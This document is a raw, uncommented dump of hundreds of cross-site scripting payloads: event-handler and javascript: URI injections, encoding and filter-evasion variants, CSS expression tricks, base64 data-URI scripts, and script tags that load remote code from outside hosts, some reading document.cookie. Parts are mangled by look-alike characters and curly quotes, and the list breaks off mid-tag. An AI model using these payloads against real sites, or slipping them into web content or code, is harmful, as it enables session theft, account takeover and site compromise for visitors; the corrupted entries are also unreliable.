<d3"<"/οnclick="1>[confirm``]"<">z
<d3/οnmοuseenter=[2].find(confirm)>z<details open οntοggle=confirm()><script y="><">/*<script* */prompt()</script<w="/x="y>"/οndblclick=`<`[confir\u006d``]>z<a href="javascript%26colon;alert(1)">click<a href=javascript:alert(1)>click<script/"<a"/src=data:=".<a,[8].some(confirm)><svg/x=">"/οnlοad=confirm()//<--`<img/src=` οnerrοr=confirm``> --!><svg%0Aοnlοad=%09((pro\u006dpt))()//<sCript x>(((confirm)))``</scRipt x><svg </onload ="1> (_=prompt,_(1)) ""><!--><script src=//14.rs><embed src=//14.rs><script x=">" src=//15.rs></script><!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //><iframe/src \/\/onload = prompt(1)<x oncut=alert()>x<svg οnlοad=write()>%0ajavascript:`/*\"/*--><svg οnlοad='/*</template></noembed></noscript></style></title></textarea></script><html οnmοuseοver="/**/ alert()//'">`<svg οnlοad=alert()></tag><svg οnlοad=alert()>"><svg οnlοad=alert()>"><svg οnlοad=alert()><b attr="" οnmοuseοver=alert() ""οnmοuseοver=alert()//"autocous/οnfοcus="alert()'-alert()-''-alert()//''}alert(1);{''}%0Aalert(1);%0A{'</script><svg οnlοad=alert()>confirm()confirm``(((confirm)))``co\u006efirm()new class extends confirm``{}[8].find(confirm)[8].map(confirm)[8].some(confirm)[8].every(confirm)[8].filter(confirm)[8].findIndex(confirm)\'-alert()//</script><svg οnlοad=alert()><svg οnlοad=alert()//<svg οnlοad=alert()<svg οnlοad=alert()><embed src=//14.rs><details open οntοggle=alert()><object data=javascript:confirm()><a href=javascript:confirm()>click here<script src=//14.rs></script><script>confirm()</script><svg/οnlοad=confirm()><iframe/src=javascript:alert(1)><svg οnlοad=confirm()><img src=x οnerrοr=confirm()><script>confirm()</script><svg οnlοad=confirm()//<script src=//14.rs></script><svg οnlοad=co\u006efirm()><svg οnlοad=z=co\u006efir\u006d,z()><x οnclick=confirm()>click here<x οndrag=aconfirm()>drag it<script\x20type="text/javascript">javascript:alert(1);</script><script\x3Etype="text/javascript">javascript:alert(1);</script><script\x0Dtype="text/javascript">javascript:alert(1);</script><script\x09type="text/javascript">javascript:alert(1);</script><script\x0Ctype="text/javascript">javascript:alert(1);</script><script\x2Ftype="text/javascript">javascript:alert(1);</script><script\x0Atype="text/javascript">javascript:alert(1);</script>'`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script><img src=1 href=1 οnerrοr="javascript:alert(1)"></img><audio src=1 href=1 οnerrοr="javascript:alert(1)"></audio><video src=1 href=1 οnerrοr="javascript:alert(1)"></video><body src=1 href=1 οnerrοr="javascript:alert(1)"></body><image src=1 href=1 οnerrοr="javascript:alert(1)"></image><object src=1 href=1 οnerrοr="javascript:alert(1)"></object><script src=1 href=1 οnerrοr="javascript:alert(1)"></script><svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize><title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange><iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad><body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter><body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus><frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll><script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange><html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp><body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange><svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad><body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide><body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver><body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload><body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad><bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange><html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave><html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel><style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad><iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange><body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow><style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange><frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus><applet onError applet onError="javascript:javascript:alert(1)"></applet onError><marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart><script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad><html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver><html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter><body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload><html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown><marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll><xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange><frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur><applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange><svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload><html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut><body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove><body onResize body onResize="javascript:javascript:alert(1)"></body onResize><object onError object onError="javascript:javascript:alert(1)"></object onError><body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState><html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove><applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange><body onpagehide body οnpagehide="javascript:javascript:alert(1)"></body onpagehide><svg onunload svg οnunlοad="javascript:javascript:alert(1)"></svg onunload><applet onerror applet οnerrοr="javascript:javascript:alert(1)"></applet onerror><body onkeyup body οnkeyup="javascript:javascript:alert(1)"></body onkeyup><body onunload body οnunlοad="javascript:javascript:alert(1)"></body onunload><iframe onload iframe οnlοad="javascript:javascript:alert(1)"></iframe onload><body onload body οnlοad="javascript:javascript:alert(1)"></body onload><html onmouseover html οnmοuseοver="javascript:javascript:alert(1)"></html onmouseover><object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload><body onbeforeunload body οnbefοreunlοad="javascript:javascript:alert(1)"></body onbeforeunload><body onfocus body οnfοcus="javascript:javascript:alert(1)"></body onfocus><body onkeydown body οnkeydοwn="javascript:javascript:alert(1)"></body onkeydown><iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload><iframe src iframe src="javascript:javascript:alert(1)"></iframe src><svg onload svg οnlοad="javascript:javascript:alert(1)"></svg onload><html onmousemove html οnmοusemοve="javascript:javascript:alert(1)"></html onmousemove><body onblur body οnblur="javascript:javascript:alert(1)"></body onblur>\x3Cscript>javascript:alert(1)</script>'"`><script>/* *\x2Fjavascript:alert(1)// */</script><script>javascript:alert(1)</script\x0D<script>javascript:alert(1)</script\x0A<script>javascript:alert(1)</script\x0B<script charset="\x22>javascript:alert(1)</script><!--\x3E<img src=xxx:x οnerrοr=javascript:alert(1)> -->--><!-- ---> <img src=xxx:x οnerrοr=javascript:alert(1)> -->--><!-- --\x00> <img src=xxx:x οnerrοr=javascript:alert(1)> -->--><!-- --\x21> <img src=xxx:x οnerrοr=javascript:alert(1)> -->--><!-- --\x3E> <img src=xxx:x οnerrοr=javascript:alert(1)> -->`"'><img src='#\x27 οnerrοr=javascript:alert(1)><a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p><a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a><a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a><script>/* *\x2A/javascript:alert(1)// */</script><script>/* *\x00/javascript:alert(1)// */</script><style></style\x3E<img src="about:blank" οnerrοr=javascript:alert(1)//></style><style></style\x0D<img src="about:blank" οnerrοr=javascript:alert(1)//></style><style></style\x09<img src="about:blank" οnerrοr=javascript:alert(1)//></style><style></style\x20<img src="about:blank" οnerrοr=javascript:alert(1)//></style><style></style\x0A<img src="about:blank" οnerrοr=javascript:alert(1)//></style>"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script><script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script><script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>'`"><\x3Cscript>javascript:alert(1)</script>'`"><\x00script>javascript:alert(1)</script>"'`><\x3Cimg src=xxx:x οnerrοr=javascript:alert(1)>"'`><\x00img src=xxx:x οnerrοr=javascript:alert(1)><script src="data:text/plain\x2Cjavascript:alert(1)"></script><script src="data:\xD4\x8F,javascript:alert(1)"></script><script src="data:\xE0\xA4\x98,javascript:alert(1)"></script><script src="data:\xCB\x8F,javascript:alert(1)"></script><script\x20type="text/javascript">javascript:alert(1);</script><script\x3Etype="text/javascript">javascript:alert(1);</script><script\x0Dtype="text/javascript">javascript:alert(1);</script><script\x09type="text/javascript">javascript:alert(1);</script><script\x0Ctype="text/javascript">javascript:alert(1);</script><script\x2Ftype="text/javascript">javascript:alert(1);</script><script\x0Atype="text/javascript">javascript:alert(1);</script>ABC<div style="x\x3Aexpression(javascript:alert(1)">DEFABC<div style="x:expression\x5C(javascript:alert(1)">DEFABC<div style="x:expression\x00(javascript:alert(1)">DEFABC<div style="x:exp\x00ression(javascript:alert(1)">DEFABC<div style="x:exp\x5Cression(javascript:alert(1)">DEFABC<div style="x:\x0Aexpression(javascript:alert(1)">DEFABC<div style="x:\x09expression(javascript:alert(1)">DEFABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEFABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEFABC<div style="x:\x0Dexpression(javascript:alert(1)">DEFABC<div style="x:\x0Cexpression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEFABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEFABC<div style="x:\x20expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEFABC<div style="x:\x00expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEFABC<div style="x:\x0Bexpression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEFABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a><a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a><a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a><a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a><a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a><a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a><a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a><a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>”;!–“<XSS>=&{()}<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>‘”>><marquee><img src=x οnerrοr=confirm(1)></marquee>”></plaintext\></|\><plaintext/οnmοuseοver=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script><script>alert(document.cookie)</script>”><img/id=”confirm(1)”/alt=”/”src=”/”οnerrοr=eval(id)>'”><img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg”><IMG SRC=”javascript:alert(‘XSS’);”><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><img src=”URL” style=’Xss:expression(alert(/xss/));’><IMG SRC=javascript:alert(‘XSS’)><IMG SRC=JaVaScRiPt:alert(‘XSS’)><IMG SRC=javascript:alert("XSS")><IMG SRC=javascript:alert(“RSnake says, ‘XSS'”)><a οnmοuseοver=”alert(document.cookie)”>xss link</a><a οnmοuseοver=alert(document.cookie)>xss link</a><IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><IMG SRC=# οnmοuseοver=”alert(‘xxs’)”><IMG SRC= οnmοuseοver=”alert(‘xxs’)”><IMG οnmοuseοver=”alert(‘xxs’)”><IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img><IMG SRC=”jav ascript:alert(‘XSS’);”><IMG SRC=”jav	ascript:alert(‘XSS’);”><IMG SRC=”jav
ascript:alert(‘XSS’);”><IMG SRC=”jav
ascript:alert(‘XSS’);”><IMG SRC=java\0script:alert(\”XSS\”)><IMG SRC=”  javascript:alert(‘XSS’);”><SCRIPT/XSS SRC=”http://xss.rocks/xss.js”></SCRIPT><BODY onload!#$%&()*~+-_.,:;?@[/|\]^=alert(“XSS”)><SCRIPT/SRC=”http://xss.rocks/xss.js”></SCRIPT><<SCRIPT>alert(“XSS”);//<</SCRIPT><SCRIPT SRC=http://xss.rocks/xss.js?< B ><SCRIPT SRC=//ha.ckers.org/.j><IMG SRC=”javascript:alert(‘XSS’)”\”;alert(‘XSS’);//</script><script>alert(‘XSS’);</script></TITLE><SCRIPT>alert(“XSS”);</SCRIPT><INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”><input type=”hidden” name=”returnurl” value=”[USER INJECT]” /><BODY BACKGROUND=”javascript:alert(‘XSS’)”><IMG DYNSRC=”javascript:alert(‘XSS’)”><IMG LOWSRC=”javascript:alert(‘XSS’)”><STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br><IMG SRC=’vbscript:msgbox(“XSS”)’><IMG SRC=”livescript:[code]”><svg/οnlοad=alert(‘XSS’)><BODY ONLOAD=alert(‘XSS’)><BGSOUND SRC=”javascript:alert(‘XSS’);”><BR SIZE=”&{alert(‘XSS’)}”><LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”><LINK REL=”stylesheet<XSS STYLE=”xss:expression(alert(‘XSS’))”>” HREF=”http://ha.ckers.org/xss.css”><STYLE>@import’http://xss.rocks/xss.css’;</STYLE><META HTTP-EQUIV=”Link” Content=”<http://xss.rocks/xss.css>; REL=stylesheet”><STYLE>BODY{-moz-binding:url(“http://xss.rocks/xssmoz.xml#xss”)}</STYLE><STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE><IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>exp/*<A STYLE=’no\xss:noxss(“*//*”); xss:ex/*XSS*//*/*/pression(alert(“XSS”))’><STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE><STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A class=”XSS”></A><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE><XSS STYLE=”xss:expression(alert(‘XSS’))”><XSS STYLE=”behavior: url(xss.htc);”>¼script¾alert(¢XSS¢)¼/script¾<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”><META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”><META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”><IFRAME SRC=”javascript:alert(‘XSS’);”></<SCRIPT SRC=”http://xss.rocks/xss.jpg”></SCRIPT>IFRAME><IFRAME SRC=# οnmοuseοver=”alert(document.cookie)”></IFRAME><FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET><TABLE BACKGROUND=”javascript:alert(‘XSS’)”><TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”><DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”><DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”><DIV STYLE=”width: expression(alert(‘XSS’));”><BASE HREF=”javascript:alert(‘XSS’);//”><OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.rocks/scriptlet.html”></OBJECT><XML ID=”xss”><I><B><IMG SRC=”javas<!– –>cript:alert(‘XSS’)”></B></I></XML> <SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN><XML SRC=”xsstest.xml” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><SCRIPT SRC=”http://xss.rocks/xss.jpg”></SCRIPT><!–#exec cmd=”/bin/echo ‘<SCR'”–><!–#exec cmd=”/bin/echo ‘IPT SRC=http://xss.rocks/xss.js></SCRIPT>'”–><? echo(‘<SCR)’; echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?><IMG SRC=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode”><META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”><SCRIPT a=”>” SRC=”httx://xss.rocks/xss.js”></SCRIPT><SCRIPT =”>” SRC=”httx://xss.rocks/xss.js”></SCRIPT><SCRIPT a=”>” ” SRC=”httx://xss.rocks/xss.js”></SCRIPT><SCRIPT a=> SRC=”httx://xss.rocks/xss.js”></SCRIPT><SCRIPT a=”>’>” SRC=”httx://xss.rocks/xss.js”></SCRIPT><SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”httx://xss.rocks/xss.js”></SCRIPT><A HREF=”http://66.102.7.147/”>XSS</A><A HREF=”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D”>XSS</A><A HREF=”http://1113982867/”>XSS</A><A HREF=”http://0x42.0x0000066.0x7.0x93/”>XSS</A><A HREF=”http://0102.0146.0007.00000223/”>XSS</A><A HREF=”//www.google.com/”>XSS</A><A HREF=”//google”>XSS</A><A HREF=”http://ha.ckers.org@google”>XSS</A><A HREF=”http://google:ha.ckers.org”>XSS</A><A HREF=”http://google.com/”>XSS</A><A HREF=”http://www.google.com./”>XSS</A><A HREF=”javascript:document.location=’http://www.google.com/'”>XSS</A><A HREF=”http://www.gohttp://www.google.com/ogle.com/”>XSS</A>/?param=javascript:alert(document.cookie)/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=<Img src = x onerror = “javascript: window.onerror = alert; throw XSS”> <Video> <source onerror = “javascript: alert (XSS)”><Input value = “XSS” type = text><applet code=”javascript:confirm(document.cookie);”><isindex x=”javascript:” οnmοuseοver=”alert(XSS)”>“></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>“><img src=”x:x” οnerrοr=”alert(XSS)”>“><iframe src=”javascript:alert(XSS)”><object data=”javascript:alert(XSS)”><isindex type=image src=1 οnerrοr=alert(XSS)><img src=x:alert(alt) οnerrοr=eval(src) alt=0><img src=”x:gif” οnerrοr=”window[‘al\u0065rt’](0)”></img><iframe/src=”data:text/html,<svg οnlοad=alert(1)>”><meta content=”
 1 
; JAVASCRIPT: alert(1)” http-equiv=”refresh”/><svg><script xlink:href=data:,window.open(‘https://www.google.com/’)></script<meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”><iframe src=javascript:alert(document.location)><form><a href=”javascript:\u0061lert(1)”>X</script><img/*%00/src=”worksinchrome:prompt(1)”/%00*/οnerrοr=’eval(src)’><style>//*{x:expression(alert(/xss/))}//<style></style>On Mouse Over<img src=”/” =_=” title=”οnerrοr=’prompt(1)'”><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe<script x> alert(1) </script 1=2<form><button formaction=javascript:alert(1)>CLICKME<input/οnmοuseοver=”javaSCRIPT:confirm(1)”<iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>(alert)(1) a=alert,a(1)[1].find(alert)top[“al”+”ert”](1)top[/al/.source+/ert/.source](1)al\u0065rt(1)top[‘al\145rt’](1)top[‘al\x65rt’](1)top[8680439..toString(30)](1)<scr<script>ipt>alert(“XSS”)</scr<script>ipt><script src=”http://attacker.org/malicious.js”></script><div οnclick=”alert(‘xss’)”>/style=[^<]*((expression\s*?[<]∗?<div style=”color: expression(alert(‘XSS’))”>‘-confirm(1)-‘<anytag οnmοuseοver=alert(15)>M<anytag οnclick=alert(16)>M<a οnmοuseοver=alert(17)>M<a οnclick=alert(18)>M<a href=javascript:alert(19)>M<button/οnclick=alert(20)>M<form/action=javascript:alert(22)><input/type=submit><form οnsubmit=alert(23)><button>M<form οnsubmit=alert(23)><button>M<img src=x οnerrοr=alert(24)> 29<body/οnlοad=alert(25)><iframe src=”http://0x.lv/xss.swf”></iframe><iframe/οnlοad=alert(document.domain)></iframe><IFRAME SRC=”javascript:alert(29);”></IFRAME><object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object><object data=”javascript:alert(document.domain)”><marquee onstart=alert(30)></marquee><isindex type=image src=1 οnerrοr=alert(31)><isindex action=javascript:alert(32) type=image><input οnfοcus=alert(33) autofocus><input οnblur=alert(34) autofocus><input autofocus><script src=”http://rhainfosec.com/evil.js”><marquee/onstart=confirm(2)><script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+' src=ht'</script><script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script><script>z=z+'.net/1.'</script><script>z=z+'js></sc'</script><script>z=z+'ript>")'</script><script>eval_r(z)</script><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><<SCRIPT>alert("XSS");//<</SCRIPT><SCRIPT SRC=http://3w.org/XSS/xss.js?<B><SCRIPT SRC=//3w.org/XSS/xss.js><IMG SRC="javascript:alert('XSS')"<iframe src=http://3w.org/XSS.html <\";alert('XSS');//</TITLE><SCRIPT>alert("XSS");</SCRIPT><INPUT SRC="javascript:alert('XSS');"><BODY BACKGROUND="javascript:alert('XSS')"><BODY('XSS')><IMG DYNSRC="javascript:alert('XSS')"><IMG LOWSRC="javascript:alert('XSS')"><BGSOUND SRC="javascript:alert('XSS');"><LINK REL="stylesheet" HREF="javascript:alert('XSS');"><LINK REL="stylesheet" HREF="http://3w.org/xss.css"><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS<IFRAME SRC="javascript:alert('XSS');"></IFRAME><TABLE BACKGROUND="javascript:alert('XSS')"><TABLE><TD BACKGROUND="javascript:alert('XSS')"><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="width: expression_r(alert('XSS'));"><IMG STYLE="xss:expression_r(alert('XSS'))"><XSS STYLE="xss:expression_r(alert('XSS'))">exppression(alert("XSS"))'><BASE HREF="javascript:alert('XSS');//"><EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED><SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT><SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT><SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT><SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT><SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT><SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT><A HREF="http://127.0.0.1/">XSS</A><A HREF="http://3w.org">XSS</A><A HREF="http://3232235521″>XSS</A><script>alert(123)</script><script>alert("hellox worldss");</script>javascript:alert("hellox worldss")<img src="javascript:alert('XSS');"><img src=javascript:alert("XSS")><"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><IFRAME SRC="javascript:alert('XSS');"></IFRAME><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT><<SCRIPT>alert("XSS");//<</SCRIPT><"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510<script>alert("XSS");</script>&search=10&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search<h1><font color=blue>hellox worldss</h1><BODY ONLOAD=alert('hellox worldss')><input οnfοcus=write(XSS) autofocus><input οnblur=write(XSS) autofocus><input autofocus><body οnscrοll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus><form><button formaction="javascript:alert(XSS)">lol<!--<img src="--><img src=x οnerrοr=alert(XSS)//"><![><img src="]><img src=x οnerrοr=alert(XSS)//"><style><img src="</style><img src=x οnerrοr=alert(XSS)//"><? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>"><? foo="><x foo='?><script>alert(1)</script>'>"><! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"><% foo><x foo="%><script>alert(123)</script>"><div style="font-family:'foo ;color:red;';">LOLLOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style><script>({0:#0=alert/#0#/#0#(0)})</script><svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg><SCRIPT>alert(/XSS/.source)</SCRIPT>\\";alert('XSS');//</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT><INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"><BODY BACKGROUND=\"javascript:alert('XSS')\"><BODY 